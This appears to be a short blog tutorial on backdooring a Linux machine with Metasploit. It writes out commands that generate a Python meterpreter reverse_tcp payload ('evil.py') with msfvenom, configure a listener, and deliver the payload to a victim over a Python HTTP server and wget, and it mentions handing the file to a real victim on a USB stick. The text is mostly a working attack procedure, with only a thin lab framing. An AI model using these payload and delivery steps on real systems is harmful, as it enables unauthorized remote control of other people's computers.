Hello friends how are you doing? In today article we will be covering how you can hack Linux systems. When most people hear about Linux Operating system what they thinks is that ” Linux can be hacked it’s secure “.
While this is true that Linux is a really secure environment and it aims towards security and privacy. Still, Linux systems can be hacked using backdoor and malware, which I will be showing you how you can do that.
So let get into it.
Creating a Backdoor:-
So previously we have seen different Windows shellcodes, what about a payload that can be used against Linux machine? There are different Linux payloads but we will be using a Python-based shell.
msfvenom -p python/meterpreter/reverse_tcp LHOST=[Kali IP] LPORT=4444 > evil.py
after the payload have been created we will need to send that payload to the victim and set up a reverse listener on Kali Linux Machine using “
FOr that first start Metasploit Framework by running ”
msfconsole ” in the terminal then type the following commands.
set payload python/meterpreter/reverse_tcp
set lhost [kali ip]
set lport 4444
Sending the Backdoor:-
In the real world case you will put the evil.py in a USB and give it to the victim but as we are doing this in our lab so I am going to host a simple http server using python and then wget the script on the victim system.
python -m SimpleHTTPServer 80
After that, I have used “wget” to download the payload on the victim’s system.
wget http://[kali ip]/file.py
Now the moment of truth if we get the reverse shell.
Let’s see in the attacker’s system if we got a reverse shell or not.
and here we go with a reverse shell now we can do whatever we want on the system find root exploits and own the system.
If you still have question and confusion here is the video that you can follow.